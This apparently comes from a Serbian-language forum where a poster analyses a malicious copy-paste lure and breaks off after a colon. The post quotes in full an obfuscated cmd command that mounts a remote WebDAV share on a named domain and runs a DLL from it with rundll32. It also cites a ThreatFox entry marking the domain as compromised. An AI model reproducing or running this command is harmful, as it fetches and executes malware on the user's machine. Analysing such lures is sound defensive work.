08-03-2026, 11:21 AM
komanda koju kopira je :
Code:
conhost.exe --headless --inheritcursor --width 80 --height 30 -- cmd /v:on /c "set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x hcwjcope.poundbahis.com@SSL@443
f679d78-ec48-498c-89f3-d5b024edd1a3 & !c!!d! goog.ct,#1"payload skida sa hcwjcope.poundbahis[.]com/f679d78-ec48-498c-89f3-d5b024edd1a3 ali ovaj poddomen trenutno nema DNS zapis pa nisam uspeo dalje.
Na https://threatfox.abuse.ch/ioc/1845585/ saznajemo da je ovaj domen kompromitovan:

